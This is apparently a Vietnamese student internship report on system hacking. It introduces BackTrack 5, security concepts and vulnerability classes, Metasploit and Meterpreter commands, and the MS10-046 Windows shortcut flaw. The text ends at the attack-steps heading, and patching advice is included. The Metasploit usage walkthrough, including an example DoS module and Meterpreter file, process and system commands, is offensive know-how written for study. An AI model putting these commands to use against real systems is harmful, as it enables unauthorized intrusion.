SlideShare a Scribd company logo
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
1 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Contents
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ................................................3
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ................................................4
CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5.............................................5
I. Giới thiệu............................................................................................................................................5
II. Mục đích............................................................................................................................................5
CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY ..................7
I. Giới thiệu .....................................................................................................................................7
II. Vấn đề bảo mật hệ thống và mạng..............................................................................................7
CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking ....................................12
I. Giới Thiệu Về Metasploit........................................................................12
1. Giới Thiệu..................................................................................................................................12
2. Các Thành Phần Của Metasploit................................................................................................13
3. Sử dụng Metasploit Framework.................................................................................................14
a) Chọn module exploit.............................................................................................................. 14
b) Cấu hình module exploit đã chọn........................................................................................... 14
c) Verify những options vừa cấu hình........................................................................................ 14
d) Lựa chọn target ...................................................................................................................... 14
e) Lựa chọn payload................................................................................................................... 15
f) Thực thi exploit...................................................................................................................... 15
4. Giới thiệu Payload Meterpreter .................................................................................................16
a) Sử dụng module Fs................................................................................................................. 16
b) Sử dụng module Net............................................................................................................... 17
c) Sử dụng module Process........................................................................................................ 17
d) Sử dụng module Sys............................................................................................................... 17
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
2 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
5. Cách phòng chống .....................................................................................................................17
II. Lỗi MS10-046 (2286198)..........................................................................18
1. Giới thiệu ...................................................................................................................................18
2. Các bước tấn công......................................................................................................................19
a. (mạng LAN)............................................................................................................................. 19
b. Triễn Khai trên vps................................................................................................................. 33
III. Cách phòng chống....................................................................................37
Tài Liệu Tham Khảo..........................................................................................37
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
3 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
.……………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
….…………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…….………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……….……………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………….…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………….………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………….……………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………….…………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………….………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………………….……………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………………….…………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………………….
NGÀY… THÁNG… NĂM
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
4 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
………………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
.……………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
….…………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…….………………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……….……………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………….…………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………….………………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………….……………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………….…………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………….………………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
……………………….……………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
………………………….…………………………………………………………………………………………………………………………………
………………………………………………………………………………………………………………………………………………………………
…………………………….
NGÀY… THÁNG… NĂM
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
5 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
CHƯƠNG I. GIỚI THIỆU VỀ BACKTRACK 5
I. Giới thiệu
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm thâm nhập.Trong các định dạng Live DVD, chúng ta sử dụng có thể Backtrack
trực tiếp từ đĩa DVD mà không cần cài nó vào máy của chúng ta. Backtrack cũng có
thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp
nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm - IWHAX,
WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên
phiên bản phân phối Linux Ubuntu 11.10. Tính đến ngày 19 tháng bảy năm 2010,
Backtrack 5 đã được tải về của hơn 1,5 triệu người sử dụng. Phiên bản mới nhất là
Backtrack 5 R2
II. Mục đích
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác
nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.
(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... hiện tại
Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là
sự kết hợp
giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và
Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử
nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack
5,0 có thể được phân loại như sau:
 Information gathering: loại này có chứa một số công cụ có thể được sử
dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa
chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được
thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào
môi trường mục tiêu.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
6 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
 Network mapping: loại này chứa các công cụ có thể được sử dụng để
kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi
mục tiêu, và cũng làm portscanning.
 Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy
các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó
cũng chứa các công cụ để thực hiện và phân tích Server Message Block
(SMB) và Simple Network Management Protocol (SNMP).
 Web application analysis: loại này chứa các công cụ có thể được sử
dụng trong theo dõi, giám sát các ứng dụng web
 Radio network analysis: Để kiểm tra mạng không dây, bluetooth và
nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ
trong thể loại này.
 Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác
các lỗ hổng tìm thấy trong các máy tính mục tiêu
 Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào
các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại
này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.
 Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta
trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có
thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có
thể cài đặt công cụ để duy trì quyền truy cập
 Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công
cụ trong thể loại này
 Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ
có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa
cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các
công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack
Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn
kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn
tính toàn vẹn. Reverse engineering: Thể loại này chứa các công cụ có thể
được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực
thi.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
7 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
CHƯƠNG 2. TÌNH HÌNH BẢO MẬT MẠNG LAN HIỆN NAY
I. Giới thiệu
An ninh an toàn mạng máy tính hoàn toàn là vấn đề con người, do đó việc đưa ra
một hành lang pháp lý và các quy nguyên tắc làm việc cụ thể là cần thiết. Ở đây, hành
lang pháp lý có thể gồm: các điều khoản trong bộ luật của nhà nước, các văn bản
dưới luật,... Còn các quy định có thể do từng tổ chức đặt ra cho phù hợp với
từng đặc điểm riêng. Các quy định có thể như: quy định về nhân sự, việc sử dụng
máy,sử dụng phần mềm,... Và như vậy, sẽ hiệu quả nhất trong việc đảm bảo an ninh
an toàn cho hệ thống mạng máy tính một khi ta thực hiện triệt để giải pháp
về chính sách con người.Tóm lại, vấn đề an ninh an toàn mạng máy tính là một
vấn đề lớn, nó yêu cầu cần phải có một giải pháp tổng thể, không chỉ phần mềm,
phần cứng máy tính mà nó đòi hỏi cả vấn đề chính sách về con người. Và vấn đề này
cần phải được thực hiện một cách thường xuyên liên tục, không bao giờ triệt để
được vì nó luôn nảy sinh theo thời gian. Tuy nhiên, bằng các giải pháp tổng thể hợp
lý, đặc biệt là giải quyết tốt vấn đề chính sách về con người ta có thể tạo ra cho
mình sự an toàn chắc chắn hơn
II. Vấn đề bảo mật hệ thống và mạng
1. Các vấn dề chung về bảo mật hệ thống và mạng
Đặc điểm chung của một hệ thống mạng là có nhiều người sử dụng
chung và phân tán về mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sử
dụng không hợp lệ) phức tạp hơn nhiều so với việc môi trường một máy tính
đơn lẻ, hoặc mộtngười sử dụng.Hoạt động của người quản trị hệ thống mạng
phải đảm bảo các thông tin trên mạng là tin cậy và sử dụng đúng mục đích, đối
tượng đồng thời đảm bảo mạng hoạt động ổn định không bị tấn công bởi những kẻ
phá hoại. Nhưng trên thực tế là không một mạng nào đảm bảo là an toàn tuyệt đối,
một hệ thống dù được bảo vệ chắc chắn đến mức nào thì cũng có lúc bị vô hiệu hóa
bởi những kẻ có ý đồ xấu.
2. Một số khái niệm và lịch sử bảo mật hệ thống
a) Đối tượng tấn công mạng (intruder)
Đối tượng là những cá nhân hoặc tổ chức sử dụng những kiến thức về
mạng và các công cụ phá hoại (gồm phần cứng hoặc phần mềm) để dò tìm các điểm
yếu và các lỗ hổng bảo mật trên hệ thống, thực hiện các hoạt động xâm nhập và
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
8 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
chiếm đoạt tài nguyên trái phép.Một số đối tượng tấn công mạng như:Hacker: là
những kẻ xâm nhập vào mạng trái phép bằng cách sử dụng các công cụ phá mật
khẩu hoặc khai thác các điểm yếu của thành phần truy nhập trên hệ thống
Masquerader : Là những
kẻ giả mạo thông tin trên mạng như giả mạo địa chỉ IP, tên miền, định danh người
dùng…Eavesdropping: Là những đối tượng nghe trộm thông tin trên mạng, sử
dụngcác công cụ Sniffer, sau đó dùng các công cụ phân tích và debug để lấy được
các thông tin có giá trị. Những đối tượng tấn công mạng có thể nhằm nhiều mục
đích khác nhau như ăn cắp các thông tin có giá trị về kinh tế, phá hoại hệ thống mạng
có chủ định, hoặc có thể đó là những hành động vô ý thức…
b) Các lỗ hổng bảo mật
Các lỗ hổng bảo mật là những điểm yếu trên hệ thống hoặc ẩn chứa trong một
dịch vụ mà dựa vào đó kẻ tấn công có thể xâm nhập trái phép vào hệ thống để thực
hiện những hành động phá hoại chiếm đoạt tài nguyên bất hợp pháp.Có nhiều
nguyên nhân gây ra những lỗ hổng bảo mật: có thể do lỗi của bản thân hệ thống, hoặc
phần mềm cung cấp hoặc người quản trị yếu kém không hiểu sâu về các dịch vụ cung
cấp…Mức độ ảnh hưởng của các lỗ hổng tới hệ thống là khác nhau. Có lỗ hổngchỉ ảnh
hưởng tới chất lượng dịch vụ cung cấp, có lỗ hổng ảnh hưởng tới toàn bộ hệ thống
hoặc phá hủy hệ thống
c) Chính sách bảo mật
Chính sách bảo mật là tập hợp các quy tắc áp dụng cho những
người tham gia quản trị mạng, có sử dụng các tài nguyên và các dịch vụ mạng.
Đối với từng trường hợp phải có chính sách bảo mật khác nhau.
Chính sách bảo mật giúp người sử dụng biết trách nhiệm của mình trong việc bảo vệ
các tài nguyên trên mạng, đồng thời còn giúp cho nhà quản trị mạng thiết lập các
biên pháp đảm bảo hữu hiệu trong quá trình trang bị, cấu hình và kiểm soát hoạt
động của hệ thống và mạng.
3. Các loại lỗ hổng bảo mật và phương thức tấn công mạng chủ yếu
a) Các loại lỗ hổng
Có nhiều các tổ chức đã tiến hành phân loại các dạng lỗ hổng đặc
biệt. Theo bộ quốc phòng Mỹ các loại lỗ hổng được phân làm ba loại như sau:
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
9 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Lỗ hổng loại C
Cho phép thực hiện các hình thức tấn công theo DoS(Denial of Services- Từ
chối dịch vụ) Mức độ nguy hiểm thấp chỉ ảnh hưởng tới chất lượng dịch vụ, làm
ngưng trệ, gián đoạn hệ thống, không làm phá hỏng dữ liệuhoặc đạt được quyền truy
cập bất hợp pháp.DoS là hình thức tấn công sử dụng các giao thức ở tầng Internet
trong bộ giao thức TCP/IP để làm hệ thống ngưng trệ dẫn đến tình trạng từ chối
người sử dụng hợp pháp truy nhập hay sử dụng hệ thống.Các dịch vụ có lỗ hổng
cho phép các cuộc tấn công DoS có thể được nângcấp hoặc sửa chữa bằng các phiên
bản mới hơn của các nhà cung cấp dịch vụ. Hiệnnay chưa có một biện pháp hữu hiệu
nào để khắc phục tình trạng tấn công kiểu nàyvì bản thân thiết kế ở tầng Internet (IP)
nói riêng và bộ giao thức TCP/IP nói chungđã ẩn chứa những nguy cơ tiềm tang của
các lỗ hổng loại này.
Lỗ hổng loại B:
Cho phép người sử dụng có thêm các quyền trên hệ thống mà không cần kiểm
tra tính hợp lệ dẫn đến mất mát thông tin yêu cầu cần bảo mật.Lỗ hổng này thường có
trong các ứng dụng trên hệ thống . Có mức độ nguy hiểm là trung bình.Lỗ hổng loại
B này có mức độ nguy hiểm hơn lỗ hổng loại C. Cho phép người sử dụng nội bộ có
thể chiếm được quyền cao hơn hoặc truy nhập không hợp pháp.
Những lỗ hổng loại này thường xuất hiện trong các dịch vụ trên hệ thống.
Ngườ sử dụng local được hiểu là người đã có quyền truy nhập vào hệ thống với một
số quyền hạn nhất định. Tìm hiểu vấn đề bảo mật mạng LAN. Một dạng khác của lỗ
hổng loại B xảy ra với các chương trình viết bằng mã nguồn C. Những chương trình
viết bằng mã nguồn C thường sử dụng một vùng đệm, một vùng trong bộ nhớ sử
dụng để lưu trữ dữ liệu trước khi xử lý. Người lập trình thường sử dụng vùng đệm
trong bộ nhớ trước khi gán một khoảng không gian bộ nhớ cho từng khối dữ liệu. Ví
dụ khi viết chương trình nhập trường tên người sử dụng quy định trường này dài 20
ký tự bằng khai báo:Char first_name [20]; Khai báo này cho phép người sử dụng
nhập tối đa 20ký tự. Khi nhập dữ liệu ban đầu dữ liệu được lưu ở vùng đệm. Khi
người sử dụng nhập nhiều hơn 20 ký tự sẽ tràn vùng đệm. Những ký tự nhập thừa sẽ
nằm ngoàivùng đệm khiến ta không thể kiểm soát được. Nhưng đối với những kẻ tấn
côngchúng có thể lợi dụng những lỗ hổng này để nhập vào những ký tự đặc biệt để
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
10 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
thực thi một số lệnh đặc biệt trên hệ thống. Thông thường những lỗ hổng này được
lợidụng bởi những người sử dụng trên hệ thống để đạt được quyền root không hợp
lệ.Để hạn chế được các lỗ hổng loại B phải
kiêm soát chặt chẽ cấu hình hệ thống vàcác chương trình.
Lỗ hổng loại A
Cho phép người ngoài hệ thống có thể truy cập bất hợp pháp vào hệ thống. Có
thể làm phá huỷ toàn bộ hệ thống. Loại lỗ hổng này có mức độ rất nguy hiểm đe dọa
tính toàn vẹn và bảo mật của hệ thống. Các lỗ hổng này thườngxuất hiện ở những hệ
thống quản trị yếu kém hoặc không kiểm soát được cấu hình mạng. Những lỗ hổng
loại này hết sức nguy hiểm vì nó đã tồn tại sẵn có trên phần mềm sử dụng, người
quản trị nếu không hiểu sâu về dịch vụ và phần mềm sử dụngcó thể bỏ qua điểm yếu
này. Vì vậy thường xuyên phải kiểm tra các thông báo của các nhóm tin về bảo mật
trên mạng để phát hiện những lỗ hổng loại này. Một loạt các chương trình phiên bản
cũ thường sử dụng có những lỗ hổng loại A như: FTP,Gopher, Telnet, Sendmail,
ARP, finger.
b) Các hình thức tấn công mạng phổ biến
Scanner
Scanner là một chương trình tự động rà soát và phát hiện những điểm yếu
về bảo mật trên một trạm làm việc cục bộ hoặc một trạm ở xa. Một kẻ phá hoại sử
dụng chương trình Scanner có thể phát hiện ra những lỗ hổng về bảo mật trên một
Server dù ở xa.Cơ chế hoạt động là rà soát và phát hiện những cổng TCP/UDP được
sử dụng trên hệ thống cần tấn công và các dịch vụ sử dụng trên hệ thống đó. Scanner
ghi lại những đáp ứng trên hệ thống từ xa tương ứng với dịch vụ mà nó phát hiện ra.
Từ đó nó có thể tìm ra điêm yếu của hệ thống. Những yếu tố để một Scanner hoạt
động như sau : Yêu cầu thiết bị và hệ thống: Môi trường có hỗ trợ TCP/IP Hệ thống
phải kết nối vào mạng Internet.Các chương trình Scanner có vai trò quan trọng trong
một hệ thống bảo mật,vì chúng có khả năng phát hiện ra những điểm yếu kém trên
một hệ thống mạng.
Password Cracker
Là một chương trình có khả năng giải mã một mật khẩu đã được mã hoá hoặc
có thể vô hiệu hoá chức năng bảo vệ mật khẩu của một hệ thống.Một số chương trình
phá khoá có nguyên tắc hoạt động khác nhau. Một số chương trình tạo ra danh sách
các từ giới hạn, áp dụng một số thuật toán mã hoá từ kết quả so sánh với Password đã
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
11 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
mã hoá cần bẻ khoá để tạo ra một danh sách khác theo một logic của chương
trình.Khi thấy phù hợp với mật khẩu đã mã hoá, kẻ phá hoại đã có được mật khẩu
dưới dạng text . Mật khẩu text thông thường sẽ được ghi vào một file.Biện pháp
khắc phục đối với
cách thức phá hoại này là cần xây dựng mộtchính sách bảo vệ mật khẩu đúng đắn.
Sniffer
Sniffer là các công cụ (phần cứng hoặc phần mềm)”bắt ”các thông tin lưu
chuyển trên mạng và lấy các thông tin có giá trị trao đổi trên mạng.Sniffer có thể
“bắt” được các thông tin trao đổi giữa nhiều trạm làm việc với nhau. Thực hiện bắt
các gói tin từ tầng IP trở xuống. Giao thức ở tầng IP được định nghĩa công khai, và
cấu trúc các trường header rõ ràng, nên việc giải mã các gói tin này không khó khăn.
Mục đích của các chương trình sniffer đó là thiết lập chế độ
promiscuous(mode dùng chung) trên các card mạng ethernet - nơi các gói tin trao
đổi trong mạng - từ đó "bắt" được thông tin.Các thiết bị sniffer có thể bắt được toàn
bộ thông tin trao đổi trên mạng là dựa vào nguyên tắc broadcast (quảng bá) các gọi
tin trong mạng Ethernet.Tuy nhiên việc thiết lập một hệ thống sniffer không phải đơn
giản vì cần phải xâm nhập được vào hệ thống mạng đó và cài đặt các phần mềm
sniffer.Đồng thời các chương trình sniffer cũng yêu cầu người sử dụng phải hiểu sâu
về kiến trúc, các giao thức mạng.Việc phát hiện hệ thống bị sniffer không phải đơn
giản, vì sniffer hoạt động ở tầng rất thấp, và không ảnh hưởng tới các ứng dụng
cũng như các dịch vụ hệ thống đó cung cấp.Tuy nhiên việc xây dựng các biện
pháp hạn chế sniffer cũng không quá khó khăn nếu ta tuân thủ các nguyên tắc về
bảo mật như:
 Không cho người lạ truy nhập vào các thiết bị trên hệ thống
 Quản lý cấu hình hệ thống chặt chẽ
 Thiết lập các kết nối có tính bảo mật cao thông qua các cơ chế mã
hoá.
Trojans
Trojans là một chương trình chạy không hợp lệ trên một hệ thống. Với vai trò
như một chương trình hợp pháp. Trojans này có thể chạy được là do các chương
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
12 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
trình hợp pháp đã bị thay đổi mã của nó thành mã bất hợp pháp.Ví dụ như các
chương trình virus là loại điển hình của Trojans. Những chương trình virus thường
che dấu các đoạn mã trong các chương trình sử dụng hợp pháp. Khi những chương
trình này được kích hoạt thì những đoạn mã ẩn dấu sẽ thực thi và chúng thực hiện
một số chức năng mà người sử dụng không biết như: ăn cắp mật khẩu hoặc copy file
mà người sử dụng như ta thường không hay biết.Một chương trình Trojans sẽ thực
hiện một trong những công việc sau:
Thực hiện một vài chức năng hoặc giúp người lập trình lên nó phát hiện
những thông tin quan trọng hoặc những thông tin cá nhân trên một hệ thống hoặcchỉ
trên một vài thành phần của hệ thống đó.
Che dấu một vài chức năng hoặc là giúp người lập trình phát hiện những
thông tin quan trọng hoặc những thông tin cá nhân trên một hệ thống hoặc chỉ trên
một vài thành phần của hệ thống. Ngoài ra còn có các chương trình Trojan có thể
thực hiện đựợc cả hai chức năng này. Có chương trình Trojan còn có thể phá hủy hệ
thống bằng cách phá hoại các thông tin trên ổ cứng. Nhưng ngày nay các Trojans
kiểu này dễ dàng bị phát hiện và khó phát huy được tác dụng.Tuy nhiên có những
trường hợp nghiêm trọng hơn những kẻ tấn công tạo ra những lỗ hổng bảo mật thông
qua Trojans và kẻ tấn công lấy được quyền root trên hệ thống và lợi dụng quyền
đó để phá hủy một phần hoặc toàn bộ hệ thống hoặc dùng quyền root để thay đổi
logfile, cài đặt các chương trình trojans khác mà ngườiquản trị không thể phát
hiện được gây ra mức độ ảnh hưởng rất nghiêm trọng và người quản trị chỉ còn
cách cài đặt lại toàn bộ hệ thống.
CHƯƠNG 3. Tấn Công Hệ Thống –System Hacking
I. Giới Thiệu Về Metasploit
1. Giới Thiệu
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin
về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thâm
nhập và phát triển hệ thống phát hiện tấn công mạng. Một dự án
con rất nổi tiếng của Metasploit là Metasploit Framework.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
13 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
Metasploit Framework là một môi trường dùng để kiểm tra ,tấn
công và khai thác lỗi của các service. Metasploit được xây dựng
từ ngôn ngữ hướng đối tượng Perl, với những components được
viết bằng C, assembler, và Python.Metasploit có thể chạy trên
hầu hết các hệ điều hành: Linux, Windows, MacOS
2. Các Thành Phần Của Metasploit
Metasploit hỗ trợ nhiều giao diện với người dùng:
 Console interface: dùng lệnh msfconsole.
Msfconsole interface sử dụng các dòng lệnh để
cấu hình, kiểm tra nên nhanh hơn và mềm dẻo
hơn
 Web interface: dùng msfweb, giao tiếp với
người dùng thông qua giao diện web
 Command line interface: dùng msfcli
Enviroment:
 Global Enviroment:được thực thi thông qua 2
câu lệnh setg và unsetg, những options được
gán ở đây sẽ mang tính toàn cục, được đưa vào
tất cả các module exploits
 Temporary Enviroment: được thực thi thông
qua 2 câu lệnh set và unset, enviroment này chỉ
được đưa vào module exploit đang load hiện
tại, không ảnh hưởng đến các module exploit
khác
Chúng có thể lưu lại enviroment mình đã cấu hình
thông qua lệnh save. Môi trường đó sẽ được lưu
trong ./msf/config và sẽ được load trở lại khi user
interface được thực hiện
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
14 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
3. Sử dụng Metasploit Framework
a) Chọn module exploit
Lựa chọn chương trình, dịch vụ lỗi mà Metasploit
có hỗ trợ để khai thác
 show exploits: xem các module exploit mà
framework có hỗ trợ
 use exploit_name: chọn module exploit
 info exploit_name: xem thông tin về module
exploit
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ
cũng như các module trên www.metasploit.com hoặc
qua lệnh msfupdate hoặc svn update
/opt/metasploit/msf3/
b) Cấu hình module exploit đã chọn
 show options: Xác định những options nào cần
cấu hình.
 set : cấu hình cho những option của module đó
Một vài module còn có những advanced options,
chúng ta có thể xem bằng cách gõ dòng lệnh show
advanceds
c) Verify những options vừa cấu hình
 check: kiểm tra xem những option đã được set
chính xác chưa.
d) Lựa chọn target
Lựa chọn hệ diều hành nào để thực hiện
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
15 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
 show targets: những target được cung cấp bởi
module đó
 set: xác định target nào
vd: msf> use
auxiliary/dos/windows/rdp/ms12_020_maxchannelid
s
e) Lựa chọn payload
Payload là đoạn code mà sẽ chạy trên hệ thống
remote machine, là một phần của virus máy tính để
thực thi mã độc.
 show payloads: liệt kê ra những payload của
module exploit hiện tại
 info payload_name: xem thông tin chi tiết về
payload đó
 Set payload payload_name: xác định payload
module name.Sau khi lựa chọn payload nào,
dùng lệnh show options để xem những options
của payload đó
 show advanced: xem những advanced options
của payload đó
f) Thực thi exploit
 exploit: lệnh dùng để thực thi payload code.
Payload sau đó sẽ cung cấp cho chúng ta
những thông tin về hệ thống được khai thác
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
16 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
4. Giới thiệu Payload Meterpreter
Meterpreter viết tắt từ Meta-Interpreter là một payload nâng
cao có trong Metasploit Framework. Mục đích của nó là để
cung cấp những tập lệnh để khai thác tấn câng các máy remote
computers.Nó được viết từ các developers dưới dạng shared
object (DLL) files. Meterpreter và các thành phần mở rộng được
thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có
thể tránh được sự phát hiện từ các phần mềm chống virus.
Meterpreter cung cấp một tập lệnh để chúng ta có
thể khai thác trên cách remote computers:
 Fs(Filesystem): cung cấp quá trình tương tác
với filesystem
 Net: cho phép xem thông tin mạng của remote
machine như IP, route table
 Process:cho phép tạo tương tác với các tiến
trình trên remote machine
 Sys: cho phép xem thông tin hệ thống, môi
trường của remote machine
a) Sử dụng module Fs
 cd directory:giống lệnh cd của commandline,
chuyển thư mục làm việc
 getcwd: cho biết thư mục đang làm việc hiện
tại
 ls: liệt kê các thư mục và tập tin
 upload src1 [src2 ...] dst: upload file từ src tới
dst.
 download src1 [src2 ...] dst: download file từ
src tới dst.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
17 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
b) Sử dụng module Net
 ipconfig: xem câu hình của card mạng của
máy tính từ xa
 route: xem bảng định tuyến của remote
machine
c) Sử dụng module Process
 execute -f file [ -a args ] [ -Hc ]:Câu lệnh
execute cho phép tạo ra một process mới
trên remote machine và sử dụng process đó
để khai thác dữ liệu
 kill pid1 pid2 pid3:huỷ hoặc tắt các process
đang chạy trên máy remote machine
 ps: liệt kê những process của remote
machine
d) Sử dụng module Sys
 getuid: cho biết username hiện tại của remote
machine
 sysinfo: cho biết thông tin về máy tính nạn
nhân: hệ điều hành, phiên bản, nền tản 32bits
hay 64bits
5. Cách phòng chống
Thường xuyên cập nhật các bản vá lỗi của Microsofts. Ví dụ như
để Metasploit không thể khai thác được lỗi Lsass_ms04_011,
chúng ta phải cập nhật bản vá lỗi của Microsoft. Theo Microsoft
đánh giá, đây là một lỗi nghiêm trọng, có trên hầu hết tất cả các
hệ điều hành windows. Chúng ta nên sử dụng hotfix có number là
835732 để vá lỗi trên.
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
18 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
II. Lỗi MS10-046 (2286198)
1. Giới thiệu
Đây là một lỗi rất nghiêm trọng liên quan đến Windows Shell cho
tất cả các hệ điều hành bị ảnh hưởng, cho phép kẻ tấn công
chiếm lấy toàn quyền điều khiển Windows và thực thi mã nguồn
từ xa. Lỗi này được phát hiện vào tháng 06/2010 và đến tháng
08/2010, Microsoft tung ba bản vá lỗi.
Lỗi nguy hiểm này nằm trong các tập tin "shortcut" (*.lnk) của
Windows, các tập tin này thường nằm ở giao diện desktop hay
trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã
độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem
tập tin shortcut hay nội dung của một thư mục chứa tập tin
shortcut nhúng mã độc.
Các bản Windows bị ảnh hưởng bao gồm
ĐỀ TÀI :Tấn Công Hệ Thống – System Hacking GVHD : PHẠM VIẾT KHA
19 PHẠM HỒNG QUANG – BÁO CÁO THỰC TẬP
2. Các bước tấn công
